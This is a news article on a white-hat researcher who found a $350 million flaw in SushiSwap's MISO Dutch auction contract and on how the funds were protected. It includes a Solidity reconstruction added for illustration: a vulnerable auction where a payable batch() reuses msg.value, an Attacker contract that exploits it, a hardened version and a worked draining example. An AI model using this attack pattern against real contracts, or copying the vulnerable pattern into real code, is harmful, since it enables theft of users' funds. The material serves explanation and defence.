White Hat Saves SushiSwap from a Potential Loss of $350 million
Sophia Cruz • 2 min read
A group of security researchers saved SushiSwap, a decentralized exchange, from a potential loss of 109,000 ETH, or about $350 million. A security researcher from Paradigm, known on Twitter as "samczsun", identified a flaw in a Dutch auction smart contract on the MISO platform. In his blog post, samczsun described how he began examining the smart contract code for the BitDAO token sale on MISO, SushiSwap's token fundraising platform. On closer inspection, he found a bug in the MISO Dutch auction contract: some of its functions lacked access control, which was extremely concerning.
On deeper inspection, the white hat found a vulnerability that, if exploited, could have let a malicious actor drain all of the ETH remaining in the auction contract. Because the contract let callers batch multiple calls into a single transaction, the same ETH payment could be counted once per batched call: an attacker could bid in the auction for free and, once the sale's cap was exceeded, trigger a large refund paid out of the ETH held by the contract. Samczsun then realized he had discovered a $350 million bug.
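The following is an illustrative reconstruction of the bug class described above, added here for this article; it is not the MISO contract's own code. The contract names, the hard-cap refund logic and the Attacker contract are assumptions chosen to show the mechanism: a payable batch() that delegatecalls back into the same contract lets every inner commitEth() read the same msg.value, so one payment is credited repeatedly and the refund path pays out real ETH.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: a simplified auction with the msg.value-in-batch bug.
// Not the MISO contract's actual code; names and cap logic are assumptions.
contract VulnerableAuction {
    mapping(address => uint256) public commitments;
    uint256 public totalCommitted;
    uint256 public immutable hardCap;

    constructor(uint256 _hardCap) {
        hardCap = _hardCap;
    }

    // Vulnerable: payable + delegatecall into this contract means every
    // inner commitEth() sees the SAME msg.value, although it was sent once.
    function batch(bytes[] calldata calls) external payable {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = address(this).delegatecall(calls[i]);
            require(ok, "batch call failed");
        }
    }

    // Credits msg.value to the caller and refunds anything over the hard cap.
    // Inside a batch, the refund is paid from ETH the contract already holds.
    function commitEth() public payable {
        uint256 amount = msg.value;
        uint256 remaining = hardCap - totalCommitted;
        if (amount > remaining) {
            uint256 refund = amount - remaining;
            amount = remaining;
            (bool sent, ) = msg.sender.call{value: refund}("");
            require(sent, "refund failed");
        }
        commitments[msg.sender] += amount;
        totalCommitted += amount;
    }
}

// Assumed attacker: sends 1 ETH once, but gets it credited n times; once the
// cap is hit, each further inner call refunds a full msg.value to the attacker.
contract Attacker {
    function attack(VulnerableAuction target, uint256 n) external payable {
        bytes[] memory calls = new bytes[](n);
        for (uint256 i = 0; i < n; i++) {
            calls[i] = abi.encodeWithSelector(VulnerableAuction.commitEth.selector);
        }
        target.batch{value: msg.value}(calls);
    }

    receive() external payable {}
}

// Hardened form: batch() is not payable, so msg.value is zero inside the
// delegatecalled functions; ETH can only enter through a direct commitEth().
contract HardenedAuction {
    mapping(address => uint256) public commitments;
    uint256 public totalCommitted;
    uint256 public immutable hardCap;

    constructor(uint256 _hardCap) {
        hardCap = _hardCap;
    }

    function batch(bytes[] calldata calls) external {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = address(this).delegatecall(calls[i]);
            require(ok, "batch call failed");
        }
    }

    function commitEth() external payable {
        _commit(msg.sender, msg.value);
    }

    // Takes the amount explicitly so the value is accounted for exactly once.
    function _commit(address who, uint256 amount) internal {
        uint256 remaining = hardCap - totalCommitted;
        if (amount > remaining) {
            uint256 refund = amount - remaining;
            amount = remaining;
            (bool sent, ) = who.call{value: refund}("");
            require(sent, "refund failed");
        }
        commitments[who] += amount;
        totalCommitted += amount;
    }
}
```

With VulnerableAuction funded by honest bidders and a hard cap of, say, 10 ETH, calling Attacker.attack{value: 1 ether}(target, 20) credits the attacker 10 ETH of commitments for 1 ETH paid and then refunds 1 ETH per remaining inner call out of the contract's balance. The hardened version rejects ETH sent to batch() outright, so the batched commitEth() calls credit nothing and refund nothing.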
After confirming the vulnerability, samczsun asked his Paradigm colleagues Georgios Konstantopoulos and Dan Robinson to verify it; they then reached out to the SushiSwap team to alert them to the bug in the MISO Dutch auction contract. SushiSwap's CTO formulated a rescue plan before any attacker could discover the flaw.
The BitDAO team immediately ended the auction manually by purchasing the remaining allocation, in order to safeguard the funds. Thanks to the tip, SushiSwap confirmed that no funds were lost. The MISO Dutch auction will remain paused until the next smart contract update.
The DeFi space has suffered a series of attacks in recent months, including those on Poly Network and Neko Network. With the rapid growth of DeFi in the crypto world, regulators are looking into tightening security requirements for these platforms, because it is not every day that a DeFi superhero of this kind comes along.